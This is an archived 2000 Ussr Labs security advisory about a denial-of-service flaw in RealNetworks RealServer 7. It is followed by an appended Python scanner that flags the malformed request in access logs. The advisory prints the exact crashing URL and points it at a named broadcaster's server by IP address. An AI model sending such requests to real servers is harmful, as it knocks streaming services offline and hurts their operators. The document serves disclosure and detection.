Subject: Remote DoS attack in Real Networks Real Server (Strike #2) Vulnerability
From: Ussr Labs (labsUSSRBACK.COM)
Date: Tue Aug 01 2000 - 05:58:16 CDT


Remote DoS attack in Real Networks Real Server (Strike #2)
Vulnerability

USSR Advisory Code: USSR-2000043

Release Date:
June 1, 2000

Systems Affected:
Real Networks Real Server 7 Linuxc6
Real Networks Real Server 7 Solaris 2.6
Real Networks Real Server 7 Solaris 2.7
Real Networks Real Server 7 Solaris 2.8
Real Networks Real Server 7 Windows NT/2000
Real Networks Real Server 7 SGI Irix 6.2
Real Networks Real Server 7 SGI Irix 6.5
Real Networks Real Server 7 SCO Unixware 7.xx
Real Networks Real Server 7 FreeBSD 3.0
Real Networks Real Server 7.01 Linuxc6
Real Networks Real Server 7.01 Solaris 2.6
Real Networks Real Server 7.01 Solaris 2.7
Real Networks Real Server 7.01 Solaris 2.8
Real Networks Real Server 7.01 Windows NT/2000
Real Networks Real Server 7.01 SGI Irix 6.2
Real Networks Real Server 7.01 SGI Irix 6.5
Real Networks Real Server 7.01 SCO Unixware 7.xx
Real Networks Real Server 7.01 FreeBSD 3.0
Real Networks Real Server G2 1.0

THE PROBLEM

The Ussr Labs team has recently discovered a memory problem in the
RealServer 7 Server (patched and non-patched).

Sending specially malformed information to the RealServer HTTP port
(default is 8080) causes the process containing the services to stop
responding.

The Exploit:
It will take down the RealServer, causing it to stop all streaming
media broadcasts and making it non-functional (until reboot).

Example:
With the RealServer server running on 'Port' (default being 8080) the
syntax to do the D.O.S. attack is:

http://ServerIp:Port/viewsource/template.html?

And Real Server will Stop Responding.

SPECIAL NOTE: We take no responsibility for this example; it is for
educational purposes only. Don't test against British Broadcasting
Corporation 1999 Radio.

Example 2:
Radio: British Broadcasting Corporation 1999 (default in RealPlayer
8)

Radio Url:
http://playlist.broadcast.com/makeplaylist.asp?id=7708&encad=2F6164732
F617564696F686967687761792F617564696F68696768776179325F3238

RealServer http running on port 80

RealServer http ip: 206.190.42.7

Valid Url for Clip Source:
http://206.190.42.7/viewsource/template.html?nuyhtgs0pdz6iqm557a6i9bgj
054ngdnbfzgro7zxfAjq357lnwEC6ne8s5ge5hi4ejqC1t6x1amngaAmkyf59v6zgjqC1t
6x1amngoAmkyf1AvuEfhe640hBh60EeADAo2097qglh

Malformed Url for Clip Source:
http://206.190.42.7/viewsource/template.html?

Vendor Status:
Yes! Informed! I sent them more than 4 emails and each time I
received JUNK mails in reply, my Incident ID number for this request
is 19163930.

Vendor Url: http://www.real.com
Program Url:
http://www.realnetworks.com/products/basicserverplus/index.html?src=home
Download Url:
http://proforma.real.com/rn/servers/eval/index.html?src=home,srvpl_020400,srvntra

Related Links:

Underground Security Systems Research
http://www.ussrback.com

Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, SecurityFocus.com, ADM, HNN,
Sub, prizm, b0f, Technotronic and Rfp.

Copyright (c) 1999-2000 Underground Security Systems Research.
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of Ussr. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please e-mail
labsussrback.com for permission.

Disclaimer:
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any damages whatsoever
arising out of or in connection with the use or spread of this
information. Any use of this information is at the user's own risk.

Feedback:
Please send suggestions, updates, and comments to:

Underground Security Systems Research
mail:labsussrback.com
http://www.ussrback.com
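
A defender-side check for the request form described in the examples above, added here and not part of the original advisory: it scans HTTP access-log lines for requests to /viewsource/template.html whose query string is empty. The Common Log Format input, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Assumption: requests to the RealServer HTTP port are logged, by the server
# or by a proxy in front of it, in Common Log Format.
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d{3}|-)'
)
VIEWSOURCE = "/viewsource/template.html"  # path named in the advisory


def classify_target(target):
    """Return 'empty-query', 'with-token', 'no-query', or None if unrelated."""
    # Drop scheme and host so absolute-form request targets are handled too.
    target = re.sub(r"^[a-z][a-z0-9+.-]*://[^/]*", "", target, flags=re.I)
    path, sep, query = target.partition("?")
    # Normalise percent-encoding, repeated slashes and case before comparing
    # (a precaution against trivially disguised paths).
    path = re.sub(r"/+", "/", unquote(path)).lower()
    if path != VIEWSOURCE:
        return None
    if query:
        return "with-token"  # ordinary clip-source request
    return "empty-query" if sep else "no-query"


def scan(lines):
    """Return (alerts, per-source counts) for the advisory's request form."""
    alerts, per_ip = [], Counter()
    for line in lines:
        m = CLF.match(line)
        if m and classify_target(m["target"]) == "empty-query":
            alerts.append((m["ip"], m["ts"], m["target"], m["status"]))
            per_ip[m["ip"]] += 1
    return alerts, per_ip


# Constructed sample log lines (documentation addresses, made-up token).
SAMPLE = [
    '192.0.2.10 - - [01/Aug/2000:10:00:01 -0500] "GET /viewsource/template.html?CONSTRUCTEDTOKEN HTTP/1.0" 200 5120',
    '198.51.100.7 - - [01/Aug/2000:10:00:05 -0500] "GET /viewsource/template.html? HTTP/1.0" 504 0',
    '198.51.100.7 - - [01/Aug/2000:10:00:09 -0500] "GET /ViewSource//template.html? HTTP/1.0" 504 0',
    '192.0.2.44 - - [01/Aug/2000:10:00:12 -0500] "GET /index.html HTTP/1.0" 200 912',
]

if __name__ == "__main__":
    for ip, ts, target, status in scan(SAMPLE)[0]:
        print(f"ALERT {ts} {ip} {target} status={status}")
```

A proxy in front of the server is the more dependable log source, since a process that has stopped responding may not write its own entry.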
